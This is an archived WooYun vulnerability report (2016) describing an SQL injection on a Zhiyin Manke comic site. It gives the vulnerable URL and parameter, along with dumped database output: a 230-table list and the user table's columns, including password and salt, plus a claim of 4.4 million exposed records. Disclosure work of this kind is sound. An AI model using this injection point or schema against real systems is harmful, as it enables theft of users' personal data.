当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173802

漏洞标题:知音漫客某站存在SQL注入漏洞(涉及440W用户信息含密码)

相关厂商:zymk.cn

漏洞作者: 路人甲

提交时间:2016-01-31 10:27

修复时间:2016-02-18 19:30

公开时间:2016-02-18 19:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-31: 细节已通知厂商并且等待厂商处理中
2016-02-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

Database: comic
Table: mk_user
[53 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| address | varchar(200) |
| addtime | datetime |
| answer | varchar(50) |
| author | int(2) |
| birthday | date |
| checkcode | varchar(4) |
| city | varchar(30) |
| classid | int(11) |
| currentweeklevel | int(11) |
| description | text |
| email | varchar(30) |
| experience | int(11) |
| face | varchar(30) |
| id | int(11) |
| intro | varchar(200) |
| jinbi | int(11) |
| lastweeklevel | int(11) |
| logintime | datetime |
| mobile | varchar(15) |
| money | int(11) |
| monthticket | int(11) |
| nettype | varchar(30) |
| nick | varchar(50) |
| password | varchar(35) |
| paymethod | varchar(15) |
| phone | varchar(15) |
| postnum | varchar(6) |
| province | varchar(10) |
| qq | varchar(15) |
| qqverify | int(1) |
| question | varchar(50) |
| realname | varchar(10) |
| regip | varchar(15) |
| salt | varchar(10) |
| sex | int(1) |
| shutup | date |
| status | int(1) |
| tongban | int(11) |
| treaty | smallint(1) |
| tuijianid | int(11) |
| type | varchar(20) |
| username | varchar(50) |
| verifycode | varchar(16) |
| vip | datetime |
| viptype | int(1) |
| vipval | int(11) |
| vipvalupdate | date |
| weibo | varchar(200) |
| weixin | varchar(200) |
| workshop | varchar(30) |
| workshopinfo | text |
| yinpiao | int(2) |
| yuanbao | int(11) |
+------------------+--------------+

1.png

漏洞证明:

http://xiao.zymk.cn/index.php/reply/index/page/1?aboutid=145625&type=100

4.png

Database: comic
[230 tables]
+------------------------+
| mk_ad                  |
| mk_adclick             |
| mk_address             |
| mk_admin               |
| mk_admingroup          |
| mk_adminmenu           |
| mk_adpos               |
| mk_album               |
| mk_alipayrurl          |
| mk_allchapter          |
| mk_allcomic            |
| mk_androidcard         |
| mk_androidcardaccessjl |
| mk_androidcardcate     |
| mk_androidcardjl       |
| mk_androidcardseason   |
| mk_androidimei         |
| mk_androidinfo         |
| mk_androidinfoclass    |
| mk_apiuser             |
| mk_area                |
| mk_article             |
| mk_article_type        |
| mk_baidudata           |
| mk_bookmark            |
| mk_caijiinfo           |
| mk_cate                |
| mk_chapter             |
| mk_charactor           |
| mk_city                |
| mk_comic               |
| mk_comicabout          |
| mk_comicaboutclass     |
| mk_comiccate           |
| mk_comicfeel           |
| mk_comiclike           |
| mk_cptag               |
| mk_cptagnum            |
| mk_customvote          |
| mk_customvotesum       |
| mk_ddtcardkey          |
| mk_delcomic            |
| mk_delnovel            |
| mk_diaocha             |
| mk_downandroid         |
| mk_ebook               |
| mk_ebookclass          |
| mk_echapter            |
| mk_editor              |
| mk_editorgroup         |
| mk_eower               |
| mk_exclusive           |
| mk_experience          |
| mk_fav                 |
| mk_feed                |
| mk_feelrecord          |
| mk_group               |
| mk_help                |
| mk_helpclass           |
| mk_hot_ad_b            |
| mk_hot_ad_c            |
| mk_hot_bg              |
| mk_hot_focus           |
| mk_indexbg             |
| mk_info                |
| mk_infoclass           |
| mk_information         |
| mk_ip                  |
| mk_job                 |
| mk_jobapp              |
| mk_joinapply           |
| mk_keywordsstyle       |
| mk_library             |
| mk_libraryclass        |
| mk_links               |
| mk_listkeywords        |
| mk_logs                |
| mk_lostorder           |
| mk_mailsend            |
| mk_minisite            |
| mk_minisite_record     |
| mk_mkcard              |
| mk_mkchapter           |
| mk_mksend              |
| mk_mksendjl            |
| mk_mkvote              |
| mk_mkvotecomic         |
| mk_mkvotedata          |
| mk_mkvotegift          |
| mk_mobiebook           |
| mk_mobilevip           |
| mk_moneyjl             |
| mk_monthticket         |
| mk_msg                 |
| mk_mvpvote             |
| mk_newlist             |
| mk_news                |
| mk_newsclass           |
| mk_nochapter           |
| mk_notice              |
| mk_novel               |
| mk_novelad             |
| mk_noveladpos          |
| mk_novelbg             |
| mk_novelchapter        |
| mk_novelfav            |
| mk_novelnews           |
| mk_novelnewsclass      |
| mk_novelpl             |
| mk_novelread           |
| mk_novelso             |
| mk_noveltheme          |
| mk_noveltj             |
| mk_order               |
| mk_permission          |
| mk_permissiongroup     |
| mk_picdown             |
| mk_picdownjl           |
| mk_pingjia             |
| mk_pinglun             |
| mk_plsupport           |
| mk_prettypic           |
| mk_product             |
| mk_productclass        |
| mk_province            |
| mk_qqcomic             |
| mk_qquser              |
| mk_race                |
| mk_raffle              |
| mk_readed              |
| mk_readfeel            |
| mk_readnum             |
| mk_readrecord          |
| mk_renrenuser          |
| mk_reprinted           |
| mk_resources           |
| mk_resourcesclass      |
| mk_ruanwen             |
| mk_school              |
| mk_share               |
| mk_shop                |
| mk_signing             |
| mk_sinauser            |
| mk_sokw                |
| mk_speluser            |
| mk_suggest             |
| mk_tag_novel           |
| mk_tag_num             |
| mk_tag_record          |
| mk_tbbuy               |
| mk_tbweek              |
| mk_template            |
| mk_tixian              |
| mk_tjclass             |
| mk_tjcomic             |
| mk_tongbancode         |
| mk_tongbanjl           |
| mk_tongji              |
| mk_tongren             |
| mk_tuangift            |
| mk_tucao               |
| mk_tuijianticket       |
| mk_u17                 |
| mk_user                |
| mk_usergroup           |
| mk_userproperties      |
| mk_vassistant          |
| mk_vauthor             |
| mk_video               |
| mk_videolist           |
| mk_vip_clear           |
| mk_vote                |
| mk_wap_set             |
| mk_weekprize           |
| mk_weekprizeinfo       |
| mk_weekprizejl         |
| mk_weekread            |
| mk_weekup              |
| mk_wish                |
| mk_xxactivity          |
| mk_xxactivitycomic     |
| mk_xxbiaoqing          |
| mk_xxdingyue           |
| mk_xxfocus             |
| mk_xxgeili             |
| mk_xxhuati             |
| mk_xxinfo              |
| mk_xxinfoclass         |
| mk_xxkendie            |
| mk_xxlinks             |
| mk_xxnews              |
| mk_xxnewsclass         |
| mk_xxreply             |
| mk_xxtimeline          |
| mk_xxuppic             |
| mk_xxyuanchuang        |
| mk_xxzhuanbo           |
| mk_yaoqingcode         |
| mk_yinpiao             |
| mk_yuanbaojl           |
| mk_zhuanti             |
| mk_zhuanticlass        |
| mk_zhuantifeel         |
| mk_zhuantiinfo         |
| mk_zhuantiinfoclass    |
| mk_zhuantimodel        |
| mk_zhuantimodelclass   |
| mk_zhuantimodeluse     |
| mk_zhuantitpl          |
| mk_zhuantitplclass     |
| mk_ztforecastcomic     |
| mk_ztforecastnum       |
| mk_ztforecastvote      |
| mk_ztforecastvotejl    |
| mk_ztinfo              |
| mk_ztinfoclass         |
| mk_ztluanjichao        |
| mk_ztname              |
| mk_ztspring2012        |
| mk_zttucao             |
| mk_ztvote              |
| mk_ztvoteclass         |
| mk_ztvotejl            |
| mk_ztxiaoxiao          |
| mk_ztxiaoxiaovote      |
| mk_ztzhushujie         |
| mk_ztzhushujietp       |
| mk_zymkad              |
| mk_zymkfloat           |
| test                   |
+------------------------+

440万用户信息:

5.png


包含用户名,密码等敏感信息:

6.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-18 19:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无